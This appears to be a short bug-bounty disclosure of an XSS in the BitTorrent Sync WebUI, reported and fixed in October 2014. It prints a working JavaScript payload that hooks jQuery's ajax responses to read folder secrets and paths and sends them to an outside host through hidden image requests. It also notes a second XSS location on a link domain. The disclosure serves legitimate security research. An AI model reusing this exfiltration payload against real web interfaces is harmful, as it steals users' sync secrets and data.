Proof of concept video (stealing secrets):
The PoC exploit uses jQuery's global ajax hook (the jQuery library is already loaded by the WebUI) to read the necessary data (secrets, in our case) directly from the WebUI's internal ajax responses instead of parsing the DOM.
Sample payload:
    var fakeImgUrl = 'http://cinu.pl/research/btsync/webui-xss/image/';
    var folders = [];

    // ajax hook - all data is there
    $(document).ajaxComplete(function(event, xhr, settings) {
        try {
            var json = $.parseJSON(xhr.responseText);
            for (var i in json.folders) {
                var str = encodeURIComponent(json.folders[i].secret + ':' + json.folders[i].path + ':' + json.folders[i].status);
                if (folders.indexOf(str) == -1) {
                    folders.push(str);
                    $('body').append('<img style=\'display:none\' src=\'' + fakeImgUrl + '?' + str + '\'>');
                    console.log('SEND ' + str);
                }
            }
        } catch (e) {
            // error
            return;
        }
    });
I also found a minor XSS on https://link.getsync.com/#f=XSS_HERE
Reported: 15.10.2014
Fixed: 16.10.2014
Unexpected surprise bounty: 500 USD